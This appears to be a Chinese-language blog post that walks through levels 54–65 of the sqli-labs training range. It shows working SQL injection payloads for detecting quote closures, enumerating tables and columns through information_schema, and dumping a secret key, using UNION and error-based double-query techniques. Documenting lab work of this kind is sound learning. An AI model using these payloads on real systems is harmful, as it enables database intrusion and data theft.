

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/head.png">
  <link rel="icon" type="image/png" href="/img/head.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="SE_Null">
  <meta name="keywords" content="">
  <title>sql-labs记录3 - SE_Null</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css" />
    
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_pf9vaxs7x7b.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>SE_Null</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/5.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container page-header text-center fade-in-up">
            <span class="h2" id="subtitle">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-06-01 00:34" pubdate>
        June 1, 2020 am
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.8k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      23
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto" id="post">
            <!-- SEO header -->
            <h1 style="display: none">sql-labs记录3</h1>
            
            <div class="markdown-body" id="post-body">
              <p>本文记录sqli-labs第54-65关，也算是踩了很多坑吧</p>
<a id="more"></a>

<h2 id="1-基础知识"><a href="#1-基础知识" class="headerlink" title="1.基础知识"></a>1.基础知识</h2><h3 id="1-判断闭合"><a href="#1-判断闭合" class="headerlink" title="1.判断闭合"></a>1.判断闭合</h3><p>之前判断闭合直接是上符号再闭合进行判断，这样是不对的，容易出错，应该采用以下方式:来源于Y4tacker</p>
<p>判断闭合方式，目前常用的闭合方式为单引号’’，单引号括号(’’)，双引号””，双引号括号(“”)</p>
<h4 id="1-常规判断方法"><a href="#1-常规判断方法" class="headerlink" title="1.常规判断方法"></a>1.常规判断方法</h4><p>1.首先尝试：</p>
<pre><code class="hljs sql">?id=1’
?id=1”</code></pre>

<ul>
<li>如果都报错，则为整形闭合。</li>
</ul>
<p>2.如果单引号报错，双引号不报错。然后尝试</p>
<ul>
<li><pre><code class="sql">?id=1&#39; --+
?id=1&#39; #  
<pre><code class="hljs routeros">
+ 无报错则单引号闭合。报错则单引号加括号。

3.如果单引号不报错，双引号报错。然后尝试

```sql
?<span class="hljs-attribute">id</span>=1&quot; --+
?<span class="hljs-attribute">id</span>=1&quot; #</code></pre>
</code></pre>
</li>
<li><p>无报错则双引号闭合。报错则双引号加括号。</p>
</li>
</ul>
<h4 id="2-真假值判断"><a href="#2-真假值判断" class="headerlink" title="2.真假值判断"></a>2.真假值判断</h4><p>1.输入（其中id=1,1是正确的数据库存在的值），正常回显</p>
<pre><code class="hljs sql">?id=1 and true <span class="hljs-comment">--+</span>
或者
?id=true and true <span class="hljs-comment">--+</span></code></pre>

<p>输入，错误回显</p>
<pre><code class="hljs sql">?id=1 and false <span class="hljs-comment">--+</span>
或者
?id=true and false <span class="hljs-comment">--+</span></code></pre>

<p>那么就是整形闭合</p>
<p>2.输入（其中id=1,1是正确的数据库存在的值），正常回显</p>
<pre><code class="hljs sql">?id=1’ and true <span class="hljs-comment">--+</span>
或者
?id=true‘ and true <span class="hljs-comment">--+</span></code></pre>

<p>输入，错误回显</p>
<pre><code class="hljs sql">?id=1’ and false <span class="hljs-comment">--+</span>
或者
?id=true‘ and false <span class="hljs-comment">--+</span></code></pre>

<p>那么就是单引号闭合，其他符号同理</p>
<h4 id="3-order-by闭合方式判断"><a href="#3-order-by闭合方式判断" class="headerlink" title="3.order by闭合方式判断()"></a>3.order by闭合方式判断()</h4><p>是否存在注入，若结果不同，就是存在注入，可以往下进行，若结果相同，判断是否为字符注入</p>
<pre><code class="hljs sql">?sort=1 desc
?sort=1 asc</code></pre>

<p>是否为数字注入，显示结果不同，则为数字注入，相同，则往下进行</p>
<pre><code class="hljs sql">?sort=right(version(),1)
?sort=left(version(),1)</code></pre>

<p>是否为布尔类型，此时我们可以用报错注入和延时注入</p>
<pre><code class="hljs sql">?sort=rand(true)
?sort=rand(false)</code></pre>

<p>是否为字符注入，回显结果不一样，就说明闭合方式为单引号，其他闭合方式（双引号，单引号括号，双引号括号）同理</p>
<pre><code class="hljs sql">?sort=1
?sort=1&#x27;</code></pre>



<h3 id="2-判断字段数"><a href="#2-判断字段数" class="headerlink" title="2.判断字段数"></a>2.判断字段数</h3><p>按照惯性思维，一般都是order by进行判断，但有时候不一定会成功，就应该考虑其他方式了。</p>
<h4 id="1-order-by"><a href="#1-order-by" class="headerlink" title="1.order by"></a>1.order by</h4><p>语法：<code>?id=1&#39; order by 1,2,3--+</code></p>
<h4 id="2-union-select"><a href="#2-union-select" class="headerlink" title="2.union select"></a>2.union select</h4><p>语法：<code>?id=1&#39; union select 1,2,3--+</code></p>
<p>在这里要说一点就是括号的优先级大于单双引号，如果我们遇到 字符型带括号类型注入，如字符型单引号小括号，如果我们在url中输入?id=1)–+ ?id=1”)–+ 由于优先级的问题页面是会返回正常，但后台数据库并没有成功的进行闭合，使用union注入后都无法成功进行注入。</p>
<h2 id="2-靶场记录"><a href="#2-靶场记录" class="headerlink" title="2.靶场记录"></a>2.靶场记录</h2><h3 id="Less54：GET-union查询-每轮允许10次"><a href="#Less54：GET-union查询-每轮允许10次" class="headerlink" title="Less54：GET-union查询-每轮允许10次"></a>Less54：GET-union查询-每轮允许10次</h3><blockquote>
<table bgcolor="#7FFFD4">题目要求：The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 10 attempts. For fun, with every reset, the challenge spawns random table name, column name, table data. Keeping it fresh at all times.</table>
<table bgcolor="#7FFFD4">意思就是此挑战的目标是在不到10次的尝试中从数据库（challenges）的随机表中转储（密钥）。超过10此就会重置，每次都会生成随机表名、列名和表数据。</table>
</blockquote>
<p> 第一关先按正常步骤来，后面的直接贴关键的了</p>
<p>1.找闭合，单引号闭合</p>
<p><img src="/2020/06/01/sql-labs%E8%AE%B0%E5%BD%953/image-20210222143225062.png" srcset="/img/loading.gif" alt="image-20210222143225062"><img src="/2020/06/01/sql-labs%E8%AE%B0%E5%BD%953/image-20210222143241840.png" srcset="/img/loading.gif" alt="image-20210222143241840"></p>
<p>单引号不正常，双引号正常，则闭合为单引号</p>
<p>2.找字段数：3</p>
<p>这一步试了很多，注释符用<code>#</code>注释不了，只能用<code>--+</code>，而且不能用<code>order by</code>进行判断，只能用 <code>union select</code></p>
<p><img src="/2020/06/01/sql-labs%E8%AE%B0%E5%BD%953/image-20210222143750422.png" srcset="/img/loading.gif" alt="image-20210222143750422"><img src="/2020/06/01/sql-labs%E8%AE%B0%E5%BD%953/image-20210222143813899.png" srcset="/img/loading.gif" alt="image-20210222143813899"></p>
<p>3.爆数据库，这一关已经给出数据库是’CHALLENGES’了，所以不用查了，但是往往需要自己查，payload如下</p>
<p><code>?id=-1&#39; union select 1,concat_ws(&#39;|&#39;,database(),version(),@@datadir,@@version_compile_os),user()  --+</code></p>
<p>4.爆表名：</p>
<p>payload:<code>?id=-1&#39; union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=&#39;CHALLENGES&#39; --+</code></p>
<p><img src="/2020/06/01/sql-labs%E8%AE%B0%E5%BD%953/image-20210222141724070.png" srcset="/img/loading.gif" alt="image-20210222141724070"></p>
<p>5.爆字段</p>
<p>payload：<code>?id=-1&#39; union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=&#39;challenges&#39; and table_name=&#39;5t0md80073&#39;--+</code></p>
<p><img src="/2020/06/01/sql-labs%E8%AE%B0%E5%BD%953/image-20210222141842212.png" srcset="/img/loading.gif" alt="image-20210222141842212"></p>
<p>有一个secret_9PML，猜测 Secret Key在这个里面</p>
<p>6.爆数据</p>
<p>payload：<code>?id=-1&#39; union select 1,2,group_concat(secret_9PML) from challenges.5t0md80073--+</code></p>
<p><img src="/2020/06/01/sql-labs%E8%AE%B0%E5%BD%953/image-20210222142214759.png" srcset="/img/loading.gif" alt="image-20210222142214759"></p>
<p>7.验证结果，正确！</p>
<p><img src="/2020/06/01/sql-labs%E8%AE%B0%E5%BD%953/image-20210222142251627.png" srcset="/img/loading.gif" alt="image-20210222142251627"></p>
<h3 id="Less55：GET-union查询-每轮允许14次-1"><a href="#Less55：GET-union查询-每轮允许14次-1" class="headerlink" title="Less55：GET-union查询-每轮允许14次-1"></a>Less55：GET-union查询-每轮允许14次-1</h3><p>判断闭合</p>
<pre><code class="hljs routeros">?<span class="hljs-attribute">id</span>=1                正确回显
?<span class="hljs-attribute">id</span>=1&#x27;      无错误异常回显
?<span class="hljs-attribute">id</span>=1&quot;      无错误异常回显		#是数字型所以单双引号都会报错
?<span class="hljs-attribute">id</span>=1&#x27;)--+   无错误异常回显	#要注意的是这里使用union注入发现单单一个数字型无法注入成功的时候就要考虑是否含有小括号
?<span class="hljs-attribute">id</span>=1&quot;)--+   无错误异常回显
?<span class="hljs-attribute">id</span>=1)--+    正确回显</code></pre>

<p>除了闭合不一样，其余都和54关一样</p>
<h3 id="Less56：GET-union查询-每轮允许14次-2"><a href="#Less56：GET-union查询-每轮允许14次-2" class="headerlink" title="Less56：GET-union查询-每轮允许14次-2"></a>Less56：GET-union查询-每轮允许14次-2</h3><p>判断回显</p>
<pre><code class="hljs routeros">?<span class="hljs-attribute">id</span>=1          正确回显
?<span class="hljs-attribute">id</span>=1&quot;          正确回显
?<span class="hljs-attribute">id</span>=1&#x27;          无错误异常回显
?<span class="hljs-attribute">id</span>=1&#x27;--+      无错误异常回显
?<span class="hljs-attribute">id</span>=1&#x27;)--+    正常回显

格外说明：（这种情况只出现在字符型注入中，造成这样的原因是括号的优先级高。如果是数字型带括号下面的语句会直接报错的，）
?<span class="hljs-attribute">id</span>=1)--+     虽然正确回显,但是后台数据库并没有闭合成功，无法进行注入
?<span class="hljs-attribute">id</span>=1&quot;)--+   虽然正确回显，但是后台数据库并没有闭合成功，无法进行注入</code></pre>

<p>其他都一样</p>
<h3 id="Less57：GET-union查询-每轮允许14次-3"><a href="#Less57：GET-union查询-每轮允许14次-3" class="headerlink" title="Less57：GET-union查询-每轮允许14次-3"></a>Less57：GET-union查询-每轮允许14次-3</h3><p>判断闭合</p>
<pre><code class="hljs routeros">?<span class="hljs-attribute">id</span>=1&#x27;				正确回显
?<span class="hljs-attribute">id</span>=1&quot;				异常回显
?<span class="hljs-attribute">id</span>=1&quot;				异常回显
?<span class="hljs-attribute">id</span>=1&quot;--+			异常回显
?<span class="hljs-attribute">id</span>=1&quot;)--+			正常回显</code></pre>

<p>其他都一样。</p>
<h3 id="Less58：GET-双查询-每轮允许5次-1"><a href="#Less58：GET-双查询-每轮允许5次-1" class="headerlink" title="Less58：GET-双查询-每轮允许5次-1"></a>Less58：GET-双查询-每轮允许5次-1</h3><p>判断闭合</p>
<pre><code class="hljs routeros">?<span class="hljs-attribute">id</span>=1&#x27;			异常回显
?<span class="hljs-attribute">id</span>=1&quot;			正常回显
?<span class="hljs-attribute">id</span>=1&#x27; -- #		正常回显</code></pre>

<p>这一关无法使用union查询，看图</p>
<p><img src="/2020/06/01/sql-labs%E8%AE%B0%E5%BD%953/image-20210222235011326.png" srcset="/img/loading.gif" alt="image-20210222235011326"><img src="/2020/06/01/sql-labs%E8%AE%B0%E5%BD%953/image-20210222235043270.png" srcset="/img/loading.gif" alt="image-20210222235043270"></p>
<p><img src="/2020/06/01/sql-labs%E8%AE%B0%E5%BD%953/image-20210222235600326.png" srcset="/img/loading.gif" alt="image-20210222235600326" style="zoom: 67%;"><img src="/2020/06/01/sql-labs%E8%AE%B0%E5%BD%953/image-20210222235625583.png" srcset="/img/loading.gif" alt="image-20210222235625583" style="zoom:80%;"></p>
<p>其他都一样</p>
<p> 使用group_concat()函数进行双注入报错</p>
<p>payload</p>
<pre><code class="hljs sql">表
?id=-1&#x27; union <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-keyword">count</span>(*),<span class="hljs-keyword">concat_ws</span>(<span class="hljs-string">&#x27;-&#x27;</span>,(<span class="hljs-keyword">select</span> <span class="hljs-keyword">group_concat</span>(table_name) <span class="hljs-keyword">from</span> information_schema.tables <span class="hljs-keyword">where</span> table_schema=<span class="hljs-string">&#x27;challenges&#x27;</span>),<span class="hljs-keyword">floor</span>(<span class="hljs-keyword">rand</span>()*<span class="hljs-number">2</span>)) <span class="hljs-keyword">as</span> a <span class="hljs-keyword">from</span> information_schema.tables <span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span> a<span class="hljs-comment">--+</span>
字段
?<span class="hljs-keyword">id</span>=<span class="hljs-number">-1</span><span class="hljs-string">&#x27; union select 1,count(*),concat_ws(&#x27;</span>-<span class="hljs-string">&#x27;,(select group_concat(column_name) from information_schema.columns where table_schema=&#x27;</span>challenges<span class="hljs-string">&#x27; and table_name=&#x27;</span>表名<span class="hljs-string">&#x27;),floor(rand()*2)) as a from information_schema.tables group by a--+</span>
<span class="hljs-string">信息</span>
<span class="hljs-string">?id=-1&#x27;</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-keyword">count</span>(*),<span class="hljs-keyword">concat_ws</span>(<span class="hljs-string">&#x27;-&#x27;</span>,(<span class="hljs-keyword">select</span> 字段名 <span class="hljs-keyword">from</span> challenges.表),<span class="hljs-keyword">floor</span>(<span class="hljs-keyword">rand</span>()*<span class="hljs-number">2</span>)) <span class="hljs-keyword">as</span> a <span class="hljs-keyword">from</span> information_schema.tables <span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span> a<span class="hljs-comment">--+</span>
</code></pre>



<h3 id="Less59：GET-双查询-每轮允许5次-2"><a href="#Less59：GET-双查询-每轮允许5次-2" class="headerlink" title="Less59：GET-双查询-每轮允许5次-2"></a>Less59：GET-双查询-每轮允许5次-2</h3><p>为数字型注入，同58类似</p>
<h3 id="Less60：GET-双查询-每轮允许5次-3"><a href="#Less60：GET-双查询-每轮允许5次-3" class="headerlink" title="Less60：GET-双查询-每轮允许5次-3"></a>Less60：GET-双查询-每轮允许5次-3</h3><p>带括号的双引号字符型注入，参考58</p>
<h3 id="Less61：GET-双查询-每轮允许5次-4"><a href="#Less61：GET-双查询-每轮允许5次-4" class="headerlink" title="Less61：GET-双查询-每轮允许5次-4"></a>Less61：GET-双查询-每轮允许5次-4</h3><p>带两个小括号的单引号字符型，参考58</p>
<h3 id="Less62：GET-盲注-每轮允许130次-1"><a href="#Less62：GET-盲注-每轮允许130次-1" class="headerlink" title="Less62：GET-盲注-每轮允许130次-1"></a>Less62：GET-盲注-每轮允许130次-1</h3><p> 字符型单引号加小括号闭合，没有报错回显信息，无法利用报错注入，</p>
<p><code>?id=1&#39;) union select 1,2,3-- #</code> 无法有效的回显我们需要的信息，也就是说无法进行union联合注入，那么我们只能进行盲注了,参考Less-8，利用二分法进行布尔盲注</p>
<h3 id="Less63：GET-盲注-每轮允许130次-2"><a href="#Less63：GET-盲注-每轮允许130次-2" class="headerlink" title="Less63：GET-盲注-每轮允许130次-2"></a>Less63：GET-盲注-每轮允许130次-2</h3><p><code>&#39;</code>闭合,其他一样</p>
<h3 id="Less64：GET-盲注-每轮允许130次-3"><a href="#Less64：GET-盲注-每轮允许130次-3" class="headerlink" title="Less64：GET-盲注-每轮允许130次-3"></a>Less64：GET-盲注-每轮允许130次-3</h3><p><code>1))</code>闭合，其他一样</p>
<h3 id="Less65GET-盲注-每轮允许130次-4"><a href="#Less65GET-盲注-每轮允许130次-4" class="headerlink" title="Less65GET-盲注-每轮允许130次-4"></a>Less65GET-盲注-每轮允许130次-4</h3><p><code>&quot;)</code>闭合，其他一样</p>
<p>后面的关卡没有源码了。。。</p>
<p>参考：<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_39934520/article/list/8">https://blog.csdn.net/weixin_39934520/article/list/8</a></p>
<p>里面很多tips我没有考虑到</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a>
                    
                  </div>
                
                
              </div>
              
                <p class="note note-warning">转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/06/01/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">文件上传</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/06/01/sql-labs%E8%AE%B0%E5%BD%952/">
                        <span class="hidden-mobile">sql-labs记录2</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <!-- <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Fluid</span></a>
    </div> -->
    
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '#post-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "sql-labs记录3&nbsp;",
      ],
      cursorChar: "",
      typeSpeed: 100,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>







  
  
    <script>
      !function (e, t, a) {
        function r() {
          for (var e = 0; e < s.length; e++) s[e].alpha <= 0 ? (t.body.removeChild(s[e].el), s.splice(e, 1)) : (s[e].y--, s[e].scale += .004, s[e].alpha -= .013, s[e].el.style.cssText = "left:" + s[e].x + "px;top:" + s[e].y + "px;opacity:" + s[e].alpha + ";transform:scale(" + s[e].scale + "," + s[e].scale + ") rotate(45deg);background:" + s[e].color + ";z-index:99999");
          requestAnimationFrame(r)
        }

        function n() {
          var t = "function" == typeof e.onclick && e.onclick;
          e.onclick = function (e) {
            t && t(), o(e)
          }
        }

        function o(e) {
          var a = t.createElement("div");
          a.className = "heart", s.push({
            el: a,
            x: e.clientX - 5,
            y: e.clientY - 5,
            scale: 1,
            alpha: 1,
            color: c()
          }), t.body.appendChild(a)
        }

        function i(e) {
          var a = t.createElement("style");
          a.type = "text/css";
          try {
            a.appendChild(t.createTextNode(e))
          } catch (t) {
            a.styleSheet.cssText = e
          }
          t.getElementsByTagName("head")[0].appendChild(a)
        }

        function c() {
          return "rgb(" + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + ")"
        }

        var s = [];
        e.requestAnimationFrame = e.requestAnimationFrame || e.webkitRequestAnimationFrame || e.mozRequestAnimationFrame || e.oRequestAnimationFrame || e.msRequestAnimationFrame || function (e) {
          setTimeout(e, 1e3 / 60)
        }, i(".heart{width: 10px;height: 10px;position: fixed;background: #f00;transform: rotate(45deg);-webkit-transform: rotate(45deg);-moz-transform: rotate(45deg);}.heart:after,.heart:before{content: '';width: inherit;height: inherit;background: inherit;border-radius: 50%;-webkit-border-radius: 50%;-moz-border-radius: 50%;position: fixed;}.heart:after{top: -5px;}.heart:before{left: -5px;}"), n(), r()
      }(window, document);
    </script>
  














</body>
</html>
